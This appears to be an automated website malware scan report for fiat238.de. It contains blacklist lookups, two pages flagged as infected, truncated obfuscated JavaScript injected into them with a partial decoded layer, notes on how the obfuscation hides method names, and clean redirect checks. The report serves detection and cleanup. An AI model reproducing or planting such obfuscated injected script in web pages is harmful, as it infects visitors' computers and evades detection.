Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fiat238.de
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fiat238.de/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://fiat238.de/ | 200 OK Content-Length: 8120 Content-Type: text/html | malicious |
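Malicious code - confirmed by antiviruses (see below):
(function(e4){var jKl=function(bWc){return bWc["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},zwU=function(nSn){return nSn[jKl(918239)]("") },qvQ=""+zwU(["\xb7z\xbdQ\xf2ZY\x94","\xff\x9a\xd3\xfa\x12","W\x81\x07\xfeI0\x028","qQ\x17r\"\x12_-\x08u","aj\x1f/?c2+\x15rQ","\x13u\x08;_\x00\x0bu","Hi\x1b\x02;c1(8uQ","\x17q%?[\x00\x0bXei","\x18+\x12J\x18+\x15r","x:X%\x12X)\x08P\x0e","\x15|AF\x03WL0;\x0e3","\x03X\x0b\x00\x1d1JS","\x16sP\x12\x0f\x08I%","P>o\x16KF;OlP\x12IiT","S\x18\x18C%#\x0dXP","\x0an*E2\x
[The report cuts the script off here.]
Decoded script:
(function(CV){p9R=32;var e0k=(function(z){var a=[UB("\xe0j\xb88k<I~\xb2hf"+"\xb2\xbc"),UB("\xf4q\xb9-w"),UB("\xeb}\xb4>w-"),UB("\xf0l\xa45z"),UB("\xe2h\xad<q=Oz\xbeig"),UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd*\xf5\xe6"),UB("\xcey\xa91"),UB("\xecn\xb8+y5ce"),UB("\xf3w\xae0k0c|"),UB("\xef}\xbb-")],b=[UB("\xe7w\xbe,r<bf"),UB("\xe5t\xb26m"),UB("\xf1y\xb3=p4"),UB(
[The report cuts the decoded script off here.]
Note: the decoded layer is itself still obfuscated, since its strings are passed through UB(...) in encoded form. In the first layer, "\x74\x6f\x53\x74\x72"+"\x69\x6e\x67" is the hex-escaped method name "toString", so jKl(918239) is the number 918239 written in base 36, which spells "join"; zwU therefore only concatenates the array of encoded string chunks. Hiding method names this way presumably serves to keep plain keywords out of the page source, so detection should not rely on matching those keywords literally.
Antivirus reports: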
| ||
http://fiat238.de/german/frameseite01.htm | 200 OK Content-Length: 5075 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
(function(e4){var jKl=function(bWc){return bWc["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},zwU=function(nSn){return nSn[jKl(918239)]("") },qvQ=""+zwU(["\xb7z\xbdQ\xf2ZY\x94","\xff\x9a\xd3\xfa\x12","W\x81\x07\xfeI0\x028","qQ\x17r\"\x12_-\x08u","aj\x1f/?c2+\x15rQ","\x13u\x08;_\x00\x0bu","Hi\x1b\x02;c1(8uQ","\x17q%?[\x00\x0bXei","\x18+\x12J\x18+\x15r","x:X%\x12X)\x08P\x0e","\x15|AF\x03WL0;\x0e3","\x03X\x0b\x00\x1d1JS","\x16sP\x12\x0f\x08I%","P>o\x16KF;OlP\x12IiT","S\x18\x18C%#\x0dXP","\x0an*E2\x
[The report cuts the script off here.]
Decoded script:
(function(CV){p9R=32;var e0k=(function(z){var a=[UB("\xe0j\xb88k<I~\xb2hf"+"\xb2\xbc"),UB("\xf4q\xb9-w"),UB("\xeb}\xb4>w-"),UB("\xf0l\xa45z"),UB("\xe2h\xad<q=Oz\xbeig"),UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd*\xf5\xe6"),UB("\xcey\xa91"),UB("\xecn\xb8+y5ce"),UB("\xf3w\xae0k0c|"),UB("\xef}\xbb-")],b=[UB("\xe7w\xbe,r<bf"),UB("\xe5t\xb26m"),UB("\xf1y\xb3=p4"),UB(
[The report cuts the decoded script off here.]
Note: the visible fragment is identical to the one reported for http://fiat238.de/, which suggests the same injected script is present in both pages; a cleanup should therefore check every HTML file on the site rather than only the index page.
Antivirus reports:
| ||
http://fiat238.de/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fiat238.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Sep 2014 21:46:24 GMT
Accept-Ranges: bytes
ETag: "4b0b7bb-1fb8-4ef3260236de2"
Server: Apache/2.2.27 (Unix)
Content-Length: 8120
Content-Type: text/html
Last-Modified: Sun, 05 Jan 2014 05:25:47 GMT
...8120 bytes of data.
GET / HTTP/1.1
Host: fiat238.de
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Sep 2014 21:46:24 GMT
Accept-Ranges: bytes
ETag: "4b0b7bb-1fb8-4ef3260236de2"
Server: Apache/2.2.27 (Unix)
Content-Length: 8120
Content-Type: text/html
Last-Modified: Sun, 05 Jan 2014 05:25:47 GMT
...8120 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fiat238.de
Referer: http://www.google.com/search?q=fiat238.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fiat238.de
Referer: http://www.google.com/search?q=fiat238.de
Result:
The result is similar to the first query. There are no suspicious redirects found.